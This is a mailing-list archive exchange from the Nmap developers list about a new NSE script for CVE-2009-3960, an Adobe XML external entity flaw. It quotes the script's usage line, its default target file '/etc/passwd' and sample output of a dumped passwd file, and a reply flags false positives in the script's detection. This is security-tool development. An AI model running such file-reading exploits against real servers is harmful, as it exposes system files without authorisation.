Nmap Development mailing list archives
Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Patrik Karlsson <patrik () cqure net>
Date: Sun, 1 Jan 2012 21:12:00 +0100
On Sat, Dec 31, 2011 at 3:47 PM, Hani Benhabiles <kroosec () gmail com> wrote:
Hi list, description = [[ Exploits cve-2009-3960 also known as Adobe XML External Entity Injection. This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0 For more information see: * http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf * http://www.osvdb.org/62292 * Metasploit module: auxiliary/scanner/http/adobe_xml_inject ]] --- -- @args http-cve-2009-3960.root Points to the root path. Defaults to "/" -- @args http-cve-2009-3960.readfile target file to be read. Defaults to "/etc/passwd" -- -- @usage -- nmap --script=http-cve-2009-3960 --script-arg http-http-cve-2009-3960.root="/root/" <target> -- --@output -- PORT STATE SERVICE -- 80/tcp open http --| http-cve-2009-3960: --| samples/messagebroker/http --| <?xml version="1.0" encoding="utf-8"?> --| <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string> [...] root:x:0:0:root:/root:/bin/bash --| bin:*:1:1:bin:/bin:/sbin/nologin --| daemon:*:2:2:daemon:/sbin:/sbin/nologin --| adm:*:3:4:adm:/var/adm:/sbin/nologin --| lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin --| sync:*:5:0:sync:/sbin:/bin/sync --| shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown --| halt:*:7:0:halt:/sbin:/sbin/halt --| mail:*:8:12:mail:/var/spool/mail:/sbin/nologin --| news:*:9:13:news:/etc/news: --| uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin --| operator:*:11:0:operator:/root:/sbin/nologin --| games:*:12:100:games:/usr/games:/sbin/nologin --| gopher:*:13:30:gopher:/var/gopher:/sbin/nologin --| ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin --| nobody:*:99:99:Nobody:/:/sbin/nologin --| nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin --| vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin --| pcap:!!:77:77::/var/arpwatch:/sbin/nologin --| mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin --| [...] --|_ Cheers, Hani -- M. Hani Benhabiles OWASP Algeria SC founder and president. Blog: http://kroosec.blogspot.com Twitter: kroosec <https://twitter.com/#%21/kroosec> _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Hi Hani, Thanks for contributing with this new script! I've had a quick look at it and see a problem with how it detects whether a server is vulnerable or not. As an example, the current script will detect any server responding to a non existant page (404) with a 200 OK with a body exceeding 120 characters as vulnerable. I guess the script needs to check for some other characteristics as well. Unfortunately I don't have access to anything I can test against, but if you have some packet captures I might be able to lend you a hand. Cheers, Patrik -- Patrik Karlsson http://www.cqure.net http://twitter.com/nevdull77 _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 01)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 01)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 01)